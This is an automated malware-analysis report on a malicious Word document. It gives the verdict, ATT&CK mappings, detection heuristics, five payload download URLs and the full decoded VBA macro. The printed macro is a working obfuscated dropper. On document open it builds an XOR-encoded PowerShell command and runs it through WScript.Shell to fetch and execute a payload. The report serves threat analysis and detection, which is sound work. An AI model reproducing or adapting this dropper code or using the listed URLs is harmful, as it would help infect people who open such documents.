Verdict: MALICIOUS
Risk Score: 350
Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
The sample is a malicious Office document containing VBA macros. The AutoOpen macro triggers the execution of a command via WScript.Shell, which is a common technique for downloading and executing additional malware. The specific command executed is obfuscated but clearly intended to run a payload. The presence of WScript.Shell and the AutoOpen macro strongly suggest a dropper or downloader functionality.
Heuristics (11)

- ClamAV: Doc.Dropper.Agent-6598986-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-6598986-0
- VBA macros detected (medium, OLE_VBA_MACROS, 5 related findings): Document contains VBA macro code
- WScript.Shell usage (critical, OLE_VBA_WSCRIPT): WScript.Shell usage. Matched lines in script:

  ```vb
  mLvmi = (SVBhj + 93686 / (DvdpHu / zdkiQ))
  lvECroMl = ijMYWwEmibW + CreateObject("Wscript.shell").Run(qBYJXFWFD + Chr(vbKeyP) + XDYuIXFn + Chr(vbKeyO) + CYEvAjDb + oIaDAmC, 885368173 - 885368173)
  VhuUk = (XwPlKO + 56315 / (jLaSs / mZFLv))
  ```

- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call. Matched the same three script lines as the WScript.Shell finding above (the `CreateObject("Wscript.shell").Run(...)` statement and its neighbours).
- Payload URL decoded from an encoded PowerShell loader, 5 URLs (high, OLE_VBA_ENCODED_PS_DROPPER_URL): A VBA macro assembles (from literals scattered across helper functions) a WScript.Shell command that runs a PowerShell stage-2 loader whose download URL is hidden in a numeric char-code array, decoded at runtime by [char]($_ -bxor k) (or +k / -k) after splitting on obfuscated delimiters. The decoded hosts (often an @-separated fallback list dropped to %TEMP% and executed) are the next-stage payload URLs, never contiguous on disk; they are surfaced as IOCs. Self-validating: only a transform yielding a valid host URL is reported.
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): AutoOpen macro. Matched lines in script:

  ```vb
  Attribute VB_Name = "XzQIhXBmbIAqiL"
  Sub AutoOpen()
  On Error Resume Next
  ```

- Reference to Windows Script Host (high, SC_STR_WSCRIPT): Reference to Windows Script Host
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact (medium, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://pulse.bg/6XK6I4Eim/ (referenced by macro)
  - http://www.srm-india.in/2MTly1/ (referenced by macro)
  - http://www.langittour.com/IWNmtIfg/ (referenced by macro)
  - http://duhocductrang.edu.vn/PfnaLg/ (referenced by macro)
  - http://www.zoetstudio.com/E4MPAsxgdj/ (referenced by macro)
  - http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8659 bytes |

SHA-256: f1f70361919fcc2bce139d87567ea6a12bd27ec7599ee2fe1b75371ba3e28d4a

Detection:
- ClamAV: No threats found
- Obfuscation or payload: likely. 153 of 262 identifiers look randomly generated (e.g. 'XzQIhXBmbIAqiL'), consistent with name-mangling obfuscation.
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "jSEcbdjk"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "XzQIhXBmbIAqiL"
Sub AutoOpen()
On Error Resume Next
TTaQU = (AFScfJ + 54119 / (irzmP / XsjtT))
bMzuEz = (AjKPWl + 25345 / (uBbwMD / fdAZbA))
TuQqA = (DiqnG + 12765 / (zTDcVf / JVzMrM))
UuiXnE = (XhaPv + 4699 / (dDPrca / BXZZj))
kikoc = (ImdtJh + 43951 / (vuClG / pOAhQ))
bnhwWR = (HXXjUb + 38708 / (ccACU / rEwHuh))
jHIwMd (zWYwswC + BAdqv + mavmVKEf)
SOdWhD = (JcnUG + 77514 / (akoGz / zuXpO))
bGNtDL = (RfsIA + 15158 / (NdjGfs / ujUZK))
HUSWF = (HlXpwl + 75856 / (uAzKF / FOQHV))
End Sub
Function jHIwMd(CYEvAjDb)
On Error Resume Next
WUhWs = (sBwaH + 4983 / (tQRuh / WXnwO))
rmMFB = (MZilW + 89491 / (DPrGIw / iIuhm))
EqXqo = (rbSwj + 70108 / (FXfhc / wEDTLR))
BqWjsi = (tkAds + 5348 / (caCiK / NtcBS))
nPJJaQ = (DTcwR + 79332 / (dBTuz / EsvYaC))
mLvmi = (SVBhj + 93686 / (DvdpHu / zdkiQ))
lvECroMl = ijMYWwEmibW + CreateObject("Wscript.shell").Run(qBYJXFWFD + Chr(vbKeyP) + XDYuIXFn + Chr(vbKeyO) + CYEvAjDb + oIaDAmC, 885368173 - 885368173)
VhuUk = (XwPlKO + 56315 / (jLaSs / mZFLv))
pJLZGi = (TvYwjw + 85293 / (QHNWl / kJzFsj))
GRINV = (FrDja + 51244 / (Wzhzb / sIjLZh))
End Function
Function zWYwswC()
On Error Resume Next
iuKMEU = pFjMw + aBofV - 84986 + OnRfYp - 96780 * zvjMPt - 72527 / wujJZ / 70447 - dtwtBc
qXqpi = dfnOWo + Jwzhao - 94316 + kmjLdo - 77330 * cvwzaE - 22707 / ZLuaR / 14757 - mlupj
qzvnJ = (42213 / osbkRC + 50578 / MRdvq) - 81033 / wHHnd / aEJFsN - dMWtib
vIBHjjFaJ = "wershe" + "ll " + " " + " " + " -JOiN" + " " + Chr(40) + " '14" + "k67C1" + "20>102" + "%23>68,7" + "9C93C7L" + "69>72" + "!64!79%"
wajwH = 84750 * cjUtw - (51504 - 28543 * GrlYzB - wikvQ)
DTIHc = 36311 * DUEhB - (93774 - 81120 * VWGKOK - CkBjQ)
OTNfhF = 71202 * dEDot - (20326 - 36600 * pPFlc - PtWZd)
WzHqw = "73>94C1" + "0D100m" + "79L94L4," + "125L" + "79%72m105" + "C70>67" + "m79>68!94" + "D17p14k"
YFwCc = 48814 * qUaqR - (49495 - 19285 * kCKRWP - ifFLCw)
bYJdzm = 62111 * FaTVw - (69219 - 93910 * uzRYt - riYBsa)
dFOMbG = 48106 * LmWHD - (86752 - 72740 * EWALXb - dlCwv)
HRBSWT = "68p91" + "D92C23D13" + "p66C94p9" + "4D90%" + "16>5p5>" + "90>95m7" + "0p89k79" + "p4C72p7" + "7D5," + "28,114m9" + "7%28"
iEwuFI = 17298 * wCrqv - (55394 - 12635 * tUhmH - Yjwsul)
lvOAU = 4071 * bdwCna - (2275 - 96249 * FmtEqr - JGZwj)
wRWTF = 87070 * jnaXD - (21460 - 93557 * wASvhV - NlYrs)
ZAHkSvHNI = "C99!" + "30k111p6" + "7!71%5" + "%106m6" + "6!94D94" + ">90C16!5" + "k5k93" + "k93%93k4," + "89p88p" + "71C7" + ",67k68" + "m78L"
rEtvDB = 24952 * moQUpq - (95586 - 28672 * Sjvah - IsSGGF)
MrtRQ = 47512 * iWWikk - (81872 - 66041 * pjKcu - zRSJal)
zMNXG = 22386 * dqaaX - (91146 - 32053 * fwjfZ - rGBjM)
KCzFSC = "67k75" + ",4,67k" + "68k5" + "k24m103%" + "126D70k8" + "3k27D5C" + "106m66k" + "94p9" + "4k90" + "p16C" + "5C5m93k93"
bwGwKb = 72957 * cJENJk - (34858 - 17531 * KMnpEc - mLXHX)
wTzhz = 47870 * aIGJj - (70212 - 62243 * ZQwKOK - zpCXW)
kuGaf = 55276 * bXaZS - (64335 - 91579 * MqznZ - dXwcLc)
DaLbW = "%93p4L70k" + "75>68!7" + "7>67p" + "94!94>6" + "9k95k88" + "%4m73"
cCaPJC = 60833 * RUILpL - (34020 - 48920 * PsLwD - ZwDdh)
TfPDvI = 81631 * vtEwa - (4146 - 53059 * BFPfj - QbzjYd)
LwEiES = 22292 * NbktoK - (4336 - 12349 * GUwTNv - wJwjUK)
lPlQukTjT = "p69D71%5" + "k99D125p" + "100p71" + "C94m" + "99p76>" + "77D5>" + "106L66p9" + "4C94" + "m90L" + "16,5p"
zWYwswC = vIBHjjFaJ + WzHqw + HRBSWT + ZAHkSvHNI + KCzFSC + DaLbW + lPlQukTjT
MjNNi = 77065 * zqDmRt - (24439 - 24748 * Yttnl - XilUH)
wZdaF = 7543 * TNwaiJ - (25962 - 58956 * LzDlAz - bVASzL)
QFZwk = 96579 * tItCbL - (9109 - 43667 * NVBwPw - NBLVPn)
End Function
Function BAdqv()
On Error Resume Next
FljHf = 43890 * BpKNW - (99432 - 73078 * FGHMH - WuOkP)
uKIEfY = 14995 * DwmKD - (7422 - 17632 * NWETCB - ErZut)
bKjTCR = 51576 * Lpftq - (50190 - 37778 * dYjaT - QVKwmB)
DMERwEa = "5L78m9" + "5!66k69>" + "73,78k" + "95k73>9" + "4L88%7" + "5p68L77!" + "4!79,78k9" + "5>4L92L" + "68%5>122m" + "76L68,7" + "5%102m77" + "m5L106,66"
iOXMb = 30170 * TiSGHo - (13497 - 52685 * qHjuP - rAKdqT)
cwctbS = 57082 * wiFBp - (40943 - 67714 * YCZUOC - VSqnWW)
rVWPjV = 82164 * GhzrfL - (17790 - 39814 * JDBijr - wltuEM)
JvQAiXbFrPR = "k94m94%90" + "m16>5k" + "5!93%93" + "D93m" + "4,80>69,7" + "9,94m89%9" + "4p95p7" + "8%67D69L"
liHmzk = 60302 * UPMwLp - (71745 - 44405 * KOqZQ - NwPVJ)
mjOVlb = 17946 * bunwSF - (11631 - 92138 * alfbh - tRCVM)
zZbVG = 43113 * NMozNr - (47855 - 58342 * aVIYmb - wjZIH)
zzjcNiTbYPC = "4C73L" + "69D71" + "p5%111L3" + "0L103k1" + "22!107C" + "89D82C" + "77>78m64C" + "5k13%4L12" + "1k90m70L"
FzwnMY = 55297 * XXzzA - (43817 - 6252 * IwSZwL - cQsisw)
RiYqJi = 69533 * DBPlmp - (39494 - 51720 * NaFwTB - mtzUXT)
ohPWzh = 67300 * cZObjZ - (31498 - 51640 * GKMRYo - dAERUE)
pMTOtoKIkzw = "67k9" + "4p2C1" + "3D106L13" + "m3%17%1" + "4C127m" + "108C6" + "5m10D2" + "3!10D13"
PhPOj = 14513 * MrjBBd - (621 - 4385 * aYkVaU - MiOdSh)
HqjFz = 82672 * GLJfwh - (50299 - 11242 * bQPvGZ - XdvtCj)
kYuFSZ = 19578 * YKVuQ - (19475 - 22063 * KHpFQ - qhwcs)
HhzaqGTzUw = "!29p27>" + "28>13L" + "17m1" + "4p68>92!" + "80p23%14" + ",79!68C" + "92>16L94k" + "79,71C9"
bBwsa = 81440 * TTDzuR - (7295 - 26470 * wmMQh - Jjvlh)
ItXvM = 23457 * AOHtWw - (42873 - 16752 * PMdjzz - UUibas)
dLfic = 22036 * XCLzT - (25098 - 53081 * cmNHvm - DlGhw)
hXBwIqdP = "0L1L13>11" + "8p13C1k1" + "4k12" + "7,108k" + "65C1C1" + "3m4D7" + "9p82k79k1"
ikVIwK = 10681 * hLjCN - (60321 - 45192 * mJAbiO - hQzOf)
wBVcc = 5273 * mErin - (53540 - 73136 * JYDDlX - zDcwQT)
zoIOL = 49402 * ChFHMp - (78425 - 86020 * TLsbRi - wRJED)
khnpO = "3L17m76" + ">69p8" + "8%79" + "m75m" + "73p6" + "6C2>14%1" + "23p65m120" + "%10%" + "67p68m10" + "m14C68D91"
zfmCw = 23312 * iNXBqw - (96332 - 36205 * iiwiho - nCQzDk)
STHvaF = 80959 * qWYna - (60572 - 52509 * buckLD - TkLmw)
rwvZEk = 17942 * alcCo - (66266 - 34061 * oCcRX - vLumRC)
LhTqRcfaiss = ",92D3L81L" + "94p88p83" + "k81>1" + "4D67" + "%120m" + "102D4!1" + "10m6" + "9%93" + "k68p70" + "D69,75"
SrAIJ = 68965 * sbtraW - (28249 - 99461 * LvKqwY - YtHNzP)
kvqIut = 66191 * QZEVmT - (69958 - 27551 * MApDCc - QuFcO)
iMpwiE = 65583 * AXNkis - (50468 - 17657 * NNMboF - ASPznK)
MdkjBpbpXcl = ",78C108" + "%67C7" + "0p79" + "p2!14C1" + "23L65%1" + "20m6>10L" + "14,6" + "8L92C80>"
oGVND = 25734 * BKpiUt - (88856 - 90493 * YqhoIm - jdVuCA)
bNWSSo = 11217 * iYjkI - (97301 - 1788 * HCiIJ - pDsCRl)
WrclI = 91040 * OTGubi - (72121 - 73252 * lSnfYA - ZlhTWr)
SiijUN = "3k17,12" + "1>94>75,8" + "8,94!7" + ",122,8" + "8m69k73L" + "79,89%" + "89p1" + "0!14L" + "68D92" + "p80k1" + "7>72%8" + "8k79!75D6"
QXTjAF = 86100 * ZlkGha - (47057 - 73483 * UjwUY - DKTbTJ)
OsiAL = 67348 * aHDMo - (8729 - 9233 * SjQzFP - rUFrwQ)
hTqBjN = 32518 * abGWHI - (17033 - 9255 * dqiZN - XrRzYT)
jjWdQz = "5,17%87" + "!73k75" + "!94,7" + "3!66p81>8" + "7C87'.SpL" + "it" + Chr(40) + " '>!%p" + ",LDmCk'" + Chr(41) + "|FoREA" + "cH { [c" + "HAr] "
BAdqv = DMERwEa + JvQAiXbFrPR + zzjcNiTbYPC + pMTOtoKIkzw + HhzaqGTzUw + hXBwIqdP + khnpO + LhTqRcfaiss + MdkjBpbpXcl + SiijUN + jjWdQz
uTmmF = 51569 * mPzhH - (81657 - 97651 * JVnSO - ZXZLdt)
FUDoq = 34750 * vCwVlE - (438 - 32070 * ozBpJ - jPQmc)
jiZZG = 44690 * chPpjb - (24028 - 56020 * fTWEsn - TEDjA)
End Function
Function mavmVKEf()
On Error Resume Next
loXEpS = 99072 * VtDzTW - (55176 - 91134 * ddEDKz - buLucN)
dwlJF = 42086 * itGRC - (46017 - 55636 * OnYpj - aEsbqn)
vNbch = 11733 * uttQYL - (11043 - 13616 * RjKhJ - kNbEJ)
JqEWmWH = Chr(40) + " $_" + "-bXor " + "0x2A " + Chr(41) + " }" + Chr(41) + " |& " + Chr(40) + " " + Chr(40) + "[" + "STRin" + "G]$ve" + "RBoSe" + "PReFERe" + "ncE" + Chr(41) + "[1," + "3]" + Chr(43) + "'x" + "'-JOiN''"
siOijm = 73529 * DuiCL - (60620 - 50466 * QMCqH - TQjOP)
jbcqXI = 80520 * IrkIzw - (64915 - 24928 * ECAwUW - AMlmO)
vHFNIs = 50282 * iMXZU - (90472 - 69185 * lHZGOj - VmjCD)
AtNRPE = Chr(41) + ""
mavmVKEf = JqEWmWH + AtNRPE
XDQLq = 28932 * ufEuFY - (99838 - 21279 * bzsFT - NHbYKI)
BXKwU = 59752 * fhiMJw - (59017 - 38371 * QELDi - HPkrwq)
BVXDRc = 35204 * fCpvsY - (53525 - 89614 * KYGWcL - kPEIq)
End Function
Attribute VB_Name = "PvbjYnsNl"